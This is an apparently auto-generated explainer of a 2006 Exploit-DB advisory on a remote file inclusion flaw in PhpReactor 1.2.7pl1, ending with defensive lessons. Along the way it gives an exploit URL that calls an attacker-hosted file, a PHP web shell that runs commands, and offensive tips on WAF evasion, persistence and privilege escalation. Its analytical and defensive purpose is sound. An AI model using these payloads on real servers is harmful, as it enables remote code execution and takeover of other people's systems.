By exploitdb papers bot•July 31, 2006•

papers

PhpReactor 1.2.7pl1 'pathtohomedir' Remote File Inclusion Explained

What this paper is

This paper details a Remote File Inclusion (RFI) vulnerability in PhpReactor version 1.2.7pl1. The vulnerability exists in the editprofile.php script and allows an attacker to include arbitrary remote files by manipulating the pathtohomedir parameter. This can lead to the execution of malicious code on the target server.

Simple technical breakdown

The core of the vulnerability lies in how the editprofile.php script handles the pathtohomedir variable. This variable is used to construct the path for including other PHP files, such as database functions, language files, and user functions.

The script uses include() statements that directly incorporate the value of $pathtohomedir without proper sanitization. If an attacker can control $pathtohomedir and point it to a remote URL (e.g., http://attacker.com/shell.txt), the server will attempt to download and execute the content of that remote file as if it were a local PHP script.

Complete code and payload walkthrough

The provided paper snippet focuses on the vulnerable code within editprofile.php and a sample exploit URL.

Vulnerable Code Snippet:

#      //INCLUDE DB FUNCTIONS
#   if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
#   //INCLUDE LANGUAGE FUNCTIONS
#   if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
#   //INCLUDE USERS FUNCTIONS
#   if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
#   //INCLUDE BBS FUNCTIONS
#   if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }

Explanation of Code Blocks:

if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }:
- Purpose: This block attempts to include the database functions file (db.inc.php).
- !defined("REACTOR_INC_DB"): This is a standard PHP mechanism to prevent a file from being included multiple times. If the constant REACTOR_INC_DB is not defined, it means this is the first time this file is being included, and the code inside the if block will execute.
- include($pathtohomedir."/inc/db.inc.php"): This is the critical part. It takes the value of the $pathtohomedir variable, appends /inc/db.inc.php to it, and then attempts to include that file. If $pathtohomedir is controlled by an attacker and points to a remote URL, the include function will fetch and execute the content from that URL.
- Input: The value of $pathtohomedir, which is expected to be a local path.
- Behavior: Downloads and executes code from the specified path if it's a remote URL.
- Output: If successful, the functions defined in db.inc.php (or the remote file) become available.
if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }:
- Purpose: Similar to the above, this block includes the language functions file (lang.inc.php).
- Behavior: Same as the db.inc.php inclusion, but for the language file.
if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }:
- Purpose: Includes the user functions file (users.inc.php).
- Behavior: Same as the db.inc.php inclusion, but for the user file.
if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }:
- Purpose: Includes the BBS (Bulletin Board System) functions file (bbs.inc.php).
- Behavior: Same as the db.inc.php inclusion, but for the BBS file.

Exploit URL Snippet:

http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?

Explanation of Exploit URL:

http://[target]/[path]/editprofile.php: This is the standard URL to access the vulnerable script on the target web server. [target] would be the domain name or IP address, and [path] would be the directory where PhpReactor is installed.
?pathtohomedir=http://phpshell.txt?: This part is the exploit payload.
- pathtohomedir=: This is the GET parameter that the editprofile.php script reads.
- http://phpshell.txt: This is the attacker-controlled remote URL. The attacker would host a file named phpshell.txt on their own server. This file would contain malicious PHP code (e.g., a web shell).
- ?: The trailing question mark is often used to terminate the URL parameters. In this specific exploit example, it might be intended to ensure that any subsequent parameters on the legitimate URL are ignored, or it might be a stylistic choice. However, the critical part is that http://phpshell.txt is passed as the value for pathtohomedir.

How it works together:

When the editprofile.php script receives the request with pathtohomedir=http://phpshell.txt?, the PHP interpreter will process the include() statements. For example, the first one:

include($pathtohomedir."/inc/db.inc.php");

becomes:

include("http://phpshell.txt?/inc/db.inc.php");

PHP's include function, when given a URL, will attempt to fetch the content from that URL. If http://phpshell.txt contains valid PHP code, it will be executed on the target server. The trailing ?/inc/db.inc.php might be ignored by the remote server or could potentially cause issues depending on how the attacker's web server is configured to handle such requests. A more robust exploit might simply use http://phpshell.txt without the trailing path.

Payload (Conceptual):

The content of http://phpshell.txt would typically be a PHP web shell, such as:

<?php
    // Basic web shell
    echo "<pre>";
    if (isset($_REQUEST['cmd'])) {
        system($_REQUEST['cmd']);
    } else {
        echo "Use ?cmd=your_command to execute commands.";
    }
    echo "</pre>";
?>

When this is included, the attacker can then send requests like http://[target]/[path]/editprofile.php?pathtohomedir=http://attacker.com/phpshell.txt&cmd=ls -la to execute commands on the server.

Mapping List:

editprofile.php: The vulnerable script.
$pathtohomedir: The user-controlled variable that forms the basis of the RFI.
include(): The PHP function that executes the vulnerability by fetching and executing remote files.
http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?: The exploit URL structure.
http://phpshell.txt: The attacker-hosted remote file containing malicious PHP code.
phpshell.txt content (e.g., web shell): The actual malicious payload.

Practical details for offensive operations teams

Required Access Level: Low. This is a remote vulnerability exploitable via HTTP GET requests. No prior authentication or local access is required.
Lab Preconditions:
- A target server running PhpReactor 1.2.7pl1 or a similarly vulnerable version.
- The target server must have PHP installed and configured to allow allow_url_fopen in php.ini. This is crucial for include() to fetch remote files.
- The target server must be accessible over the network from the attacker's position.
- An attacker-controlled server to host the malicious payload (e.g., phpshell.txt).
Tooling Assumptions:
- A web browser or an HTTP request tool (like curl, Burp Suite, OWASP ZAP) to craft and send the exploit request.
- A web server (e.g., Apache, Nginx) on the attacker's machine to serve the malicious payload.
- A text editor to create the malicious payload file.
Execution Pitfalls:
- allow_url_fopen disabled: If allow_url_fopen is disabled in the target's php.ini, the include() function will not be able to fetch remote files, and the exploit will fail.
- Web Application Firewalls (WAFs): Modern WAFs might detect and block requests containing URLs in GET parameters, especially if they look like common RFI patterns.
- Incorrect Path/URL: Typos in the target URL, the path to editprofile.php, or the attacker's payload URL will cause the exploit to fail.
- Payload Format: The remote file must contain valid PHP code that can be executed. If it's plain text or malformed PHP, it won't work as intended.
- Trailing Characters: The exact behavior of the trailing ? in the exploit URL might vary. Sometimes, a simpler pathtohomedir=http://attacker.com/shell.php is more reliable. The paper's example might be specific to a particular server configuration or a slightly different interpretation of how PHP handles include with URLs.
- File Extension: While the example uses .txt, it's generally better to use a .php extension for the remote payload to ensure it's interpreted as PHP code by the target server.
Tradecraft Considerations:
- Reconnaissance: Identify the target application (PhpReactor) and its version. Probe for allow_url_fopen status if possible (though this is difficult remotely without prior knowledge).
- Payload Hosting: Ensure the payload server is stable and accessible. Consider using a domain that doesn't immediately flag as malicious.
- Obfuscation: If initial attempts are blocked, consider obfuscating the payload or the URL parameters to bypass WAFs.
- Post-Exploitation: Once a shell is established, immediately look for ways to maintain persistence and escalate privileges.

Where this was used and when

This vulnerability was published in July 2006. At that time, Remote File Inclusion was a prevalent and highly effective attack vector against PHP applications. PhpReactor was a content management system or forum software, and vulnerabilities like this were common in such web applications before more robust security practices and frameworks became widespread. It's likely this vulnerability was exploited in the wild by various actors targeting websites running this specific version of PhpReactor.

Defensive lessons for modern teams

Input Validation and Sanitization: This is the most critical lesson. Never trust user input. All external inputs (GET, POST, COOKIE, headers) that are used in file operations (like include, require, fopen, file_get_contents) must be rigorously validated and sanitized.
- Whitelisting: Only allow specific, known-good values. For file paths, this means ensuring they point to expected locations and files.
- Blacklisting (less effective): Avoid relying solely on blacklisting potentially dangerous characters or patterns, as attackers can often find ways around them.
Disable allow_url_fopen and allow_url_include: In php.ini, set allow_url_fopen = Off and allow_url_include = Off. This prevents PHP's core functions from fetching remote files, mitigating a vast class of RFI vulnerabilities. If remote file inclusion is absolutely necessary for a legitimate function, it should be implemented with extreme caution and robust validation.
Use Secure Frameworks: Modern PHP frameworks (e.g., Laravel, Symfony) often provide built-in mechanisms for secure file handling and routing, reducing the likelihood of such vulnerabilities.
Regular Patching and Updates: Keep all software, including web applications and their dependencies, up to date with the latest security patches.
Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts. However, WAFs should be a layer of defense, not the sole solution.
Code Auditing: Regularly audit application code for security flaws, especially in areas that handle user input and file operations.

ASCII visual (if applicable)

This vulnerability is a direct path manipulation, so a complex architecture diagram isn't strictly necessary. However, we can visualize the data flow:

+-----------------+      +-----------------------+      +-------------------+
| Attacker's Host |----->| Target Web Server     |----->| PhpReactor Script |
| (Serves payload)|      | (e.g., Apache/Nginx)  |      | (editprofile.php) |
+-----------------+      +-----------------------+      +---------+---------+
                                                                  |
                                                                  | $pathtohomedir = "http://attacker.com/shell.php"
                                                                  v
                                                        +-------------------+
                                                        | PHP include()     |
                                                        | function          |
                                                        +---------+---------+
                                                                  |
                                                                  | Fetches and executes remote file
                                                                  v
                                                        +-------------------+
                                                        | Attacker's Payload|
                                                        | (shell.php code)  |
                                                        +-------------------+

Source references

PAPER ID: 2095
PAPER TITLE: PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion
AUTHOR: CeNGiZ-HaN
PUBLISHED: 2006-07-31
KEYWORDS: PHP, webapps
PAPER URL: https://www.exploit-db.com/papers/2095
RAW URL: https://www.exploit-db.com/raw/2095

Original Exploit-DB Content (Verbatim)

###########################    www.system-defacers.org         ###############
#    Found By CeNGiZ-HaN cengiz-han@system-defacers.org
#    phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
############################################################################
#    Vulnerable Code in editprofile.php
#      //INCLUDE DB FUNCTIONS
#   if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
#   //INCLUDE LANGUAGE FUNCTIONS
#   if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
#   //INCLUDE USERS FUNCTIONS
#   if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
#   //INCLUDE BBS FUNCTIONS
#   if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }
#
#
#              http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?
#
##############################################################################
#
#        W W W . S Y S T E M - D E F A C E R S . O R G
#
##############################################################################

# milw0rm.com [2006-07-31]